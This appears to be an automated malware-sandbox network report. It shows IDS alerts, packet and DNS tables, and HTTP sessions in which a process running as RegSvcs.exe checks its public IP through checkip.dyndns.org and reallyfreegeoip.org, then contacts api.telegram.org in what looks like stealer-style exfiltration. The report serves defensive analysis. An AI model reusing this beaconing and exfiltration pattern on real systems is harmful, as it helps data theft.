2024-12-16T13:37:08.701345+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49705 | 193.122.130.0 | 80 | TCP
2024-12-16T13:37:11.373100+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49705 | 193.122.130.0 | 80 | TCP
2024-12-16T13:37:12.992245+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.8 | 49707 | 104.21.67.152 | 443 | TCP
2024-12-16T13:37:14.279449+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49708 | 193.122.130.0 | 80 | TCP
2024-12-16T13:37:15.900329+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.8 | 49709 | 104.21.67.152 | 443 | TCP
2024-12-16T13:37:27.957196+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.8 | 49721 | 104.21.67.152 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                  Dec 16, 2024 13:37:15.901135921 CET49709443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:16.336560965 CET4971080192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:16.456681967 CET8049710193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:16.456777096 CET4971080192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:16.457046986 CET4971080192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:16.577110052 CET8049710193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:17.554649115 CET8049710193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:17.556231976 CET49711443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:17.556271076 CET44349711104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:17.556374073 CET49711443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:17.556663036 CET49711443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:17.556678057 CET44349711104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:17.607485056 CET4971080192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:18.837696075 CET44349711104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:18.869643927 CET49711443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:18.869679928 CET44349711104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:19.284445047 CET44349711104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:19.284507036 CET44349711104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:19.284554958 CET49711443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:19.285470963 CET49711443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:19.290592909 CET4971080192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:19.292072058 CET4971280192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:19.410686016 CET8049710193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:19.410769939 CET4971080192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:19.411854982 CET8049712193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:19.411962032 CET4971280192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:19.418664932 CET4971280192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:19.538768053 CET8049712193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:20.507086992 CET8049712193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:20.509010077 CET49713443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:20.509054899 CET44349713104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:20.509129047 CET49713443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:20.509516954 CET49713443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:20.509531975 CET44349713104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:20.560688019 CET4971280192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:21.721535921 CET44349713104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:21.739442110 CET49713443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:21.739476919 CET44349713104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:22.170304060 CET44349713104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:22.170372009 CET44349713104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:22.170445919 CET49713443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:22.172338963 CET49713443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:22.177422047 CET4971280192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:22.187901974 CET4971480192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:22.297648907 CET8049712193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:22.297712088 CET4971280192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:22.308480024 CET8049714193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:22.308557987 CET4971480192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:22.308821917 CET4971480192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:22.429163933 CET8049714193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:23.404773951 CET8049714193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:23.407084942 CET49717443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:23.407126904 CET44349717104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:23.407365084 CET49717443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:23.407677889 CET49717443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:23.407691002 CET44349717104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:23.451252937 CET4971480192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:24.620472908 CET44349717104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:24.622884035 CET49717443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:24.622917891 CET44349717104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:25.071387053 CET44349717104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:25.071454048 CET44349717104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:25.072262049 CET49717443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:25.072262049 CET49717443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:25.076711893 CET4971480192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:25.078221083 CET4971980192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:25.196897984 CET8049714193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:25.197995901 CET8049719193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:25.198168039 CET4971480192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:25.198427916 CET4971980192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:25.198427916 CET4971980192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:25.318306923 CET8049719193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:26.296544075 CET8049719193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:26.299184084 CET49721443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:26.299237967 CET44349721104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:26.299319029 CET49721443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:26.299597025 CET49721443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:26.299611092 CET44349721104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:26.341907978 CET4971980192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:27.511307001 CET44349721104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:27.520122051 CET49721443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:27.520148993 CET44349721104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:27.957217932 CET44349721104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:27.957295895 CET44349721104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:27.957508087 CET49721443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:27.958175898 CET49721443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:27.961738110 CET4971980192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:27.963016033 CET4972380192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:28.081945896 CET8049719193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:28.082048893 CET4971980192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:28.082979918 CET8049723193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:28.083059072 CET4972380192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:28.083249092 CET4972380192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:28.203670025 CET8049723193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:29.183563948 CET8049723193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:29.185334921 CET49724443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:29.185434103 CET44349724104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:29.185570002 CET49724443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:29.185868025 CET49724443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:29.185899019 CET44349724104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:29.232533932 CET4972380192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:30.398967028 CET44349724104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:30.451297045 CET49724443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:30.551383018 CET49724443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:30.551398039 CET44349724104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:30.878866911 CET44349724104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:30.878942013 CET44349724104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:30.879076004 CET49724443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:30.879659891 CET49724443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:30.883002043 CET4972380192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:30.884324074 CET4972580192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:31.003094912 CET8049723193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:31.003249884 CET4972380192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:31.004095078 CET8049725193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:31.004180908 CET4972580192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:31.004462004 CET4972580192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:31.124814034 CET8049725193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:32.101073980 CET8049725193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:32.105231047 CET49726443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:32.105278015 CET44349726104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:32.105375051 CET49726443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:32.105662107 CET49726443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:32.105675936 CET44349726104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:32.154403925 CET4972580192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:33.321366072 CET44349726104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:33.329333067 CET49726443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:33.329380989 CET44349726104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:33.768723965 CET44349726104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:33.768898010 CET44349726104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:33.769143105 CET49726443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:33.769454956 CET49726443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:33.787465096 CET4972580192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:33.908034086 CET8049725193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:33.908801079 CET4972580192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:33.930661917 CET49727443192.168.2.8149.154.167.220
                                                                                                                                  Dec 16, 2024 13:37:33.930726051 CET44349727149.154.167.220192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:33.930836916 CET49727443192.168.2.8149.154.167.220
                                                                                                                                  Dec 16, 2024 13:37:33.931432962 CET49727443192.168.2.8149.154.167.220
                                                                                                                                  Dec 16, 2024 13:37:33.931457996 CET44349727149.154.167.220192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:35.300967932 CET44349727149.154.167.220192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:35.301131964 CET49727443192.168.2.8149.154.167.220
                                                                                                                                  Dec 16, 2024 13:37:35.305711985 CET49727443192.168.2.8149.154.167.220
                                                                                                                                  Dec 16, 2024 13:37:35.305722952 CET44349727149.154.167.220192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:35.306216002 CET44349727149.154.167.220192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:35.307867050 CET49727443192.168.2.8149.154.167.220
                                                                                                                                  Dec 16, 2024 13:37:35.355329037 CET44349727149.154.167.220192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:35.803402901 CET44349727149.154.167.220192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:35.803489923 CET44349727149.154.167.220192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:35.803596020 CET49727443192.168.2.8149.154.167.220
                                                                                                                                  Dec 16, 2024 13:37:35.879654884 CET49727443192.168.2.8149.154.167.220
                                                                                                                                  Dec 16, 2024 13:37:50.368917942 CET4970880192.168.2.8193.122.130.0
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 16, 2024 13:37:06.623429060 CET | 61521 | 53 | 192.168.2.8 | 1.1.1.1
Dec 16, 2024 13:37:06.761351109 CET | 53 | 61521 | 1.1.1.1 | 192.168.2.8
Dec 16, 2024 13:37:08.687918901 CET | 53554 | 53 | 192.168.2.8 | 1.1.1.1
Dec 16, 2024 13:37:09.155798912 CET | 53 | 53554 | 1.1.1.1 | 192.168.2.8
Dec 16, 2024 13:37:33.788218975 CET | 51235 | 53 | 192.168.2.8 | 1.1.1.1
Dec 16, 2024 13:37:33.927192926 CET | 53 | 51235 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 16, 2024 13:37:06.623429060 CET | 192.168.2.8 | 1.1.1.1 | 0x507f | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Dec 16, 2024 13:37:08.687918901 CET | 192.168.2.8 | 1.1.1.1 | 0xc50b | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Dec 16, 2024 13:37:33.788218975 CET | 192.168.2.8 | 1.1.1.1 | 0xfbc8 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 16, 2024 13:37:06.761351109 CET | 1.1.1.1 | 192.168.2.8 | 0x507f | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 16, 2024 13:37:06.761351109 CET | 1.1.1.1 | 192.168.2.8 | 0x507f | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 13:37:06.761351109 CET | 1.1.1.1 | 192.168.2.8 | 0x507f | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 13:37:06.761351109 CET | 1.1.1.1 | 192.168.2.8 | 0x507f | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 13:37:06.761351109 CET | 1.1.1.1 | 192.168.2.8 | 0x507f | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 13:37:06.761351109 CET | 1.1.1.1 | 192.168.2.8 | 0x507f | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 13:37:09.155798912 CET | 1.1.1.1 | 192.168.2.8 | 0xc50b | No error (0) | reallyfreegeoip.org | | 104.21.67.152 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 13:37:09.155798912 CET | 1.1.1.1 | 192.168.2.8 | 0xc50b | No error (0) | reallyfreegeoip.org | | 172.67.177.134 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 13:37:33.927192926 CET | 1.1.1.1 | 192.168.2.8 | 0xfbc8 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
• reallyfreegeoip.org
• api.telegram.org
• checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49705 | 193.122.130.0 | 80 | 4780 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 13:37:06.892929077 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Dec 16, 2024 13:37:08.265475035 CET | 321 | IN | HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 12:37:08 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: e0b9244e46191548d97edf16dd5e1fab
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 16, 2024 13:37:08.272860050 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Dec 16, 2024 13:37:08.645967007 CET | 321 | IN | HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 12:37:08 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: aa40f9c69a17275c66b0a75ea53e7732
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 16, 2024 13:37:10.983530998 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Dec 16, 2024 13:37:11.325221062 CET | 321 | IN | HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 12:37:11 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 52d6f3eeb987d82fb02fddda2d304e79
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49708 | 193.122.130.0 | 80 | 4780 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 13:37:13.118542910 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Dec 16, 2024 13:37:14.230257034 CET | 321 | IN | HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 12:37:14 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 8ebd0910ee945d001ffb0dc419e2649b
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49710 | 193.122.130.0 | 80 | 4780 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 13:37:16.457046986 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Dec 16, 2024 13:37:17.554649115 CET | 321 | IN | HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 12:37:17 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: c209dadd30e49be97074619c948e01e0
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49712 | 193.122.130.0 | 80 | 4780 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 13:37:19.418664932 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Dec 16, 2024 13:37:20.507086992 CET | 321 | IN | HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 12:37:20 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 67ada7149c52fc30ecff77fd270002c9
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49714 | 193.122.130.0 | 80 | 4780 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 13:37:22.308821917 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Dec 16, 2024 13:37:23.404773951 CET | 321 | IN | HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 12:37:23 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 69cf4b293719b0b20182e518009796c1
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49719 | 193.122.130.0 | 80 | 4780 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 13:37:25.198427916 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Dec 16, 2024 13:37:26.296544075 CET | 321 | IN | HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 12:37:26 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 352739f19f0e93c475cc342ec41f5119
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.8 | 49723 | 193.122.130.0 | 80 | 4780 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
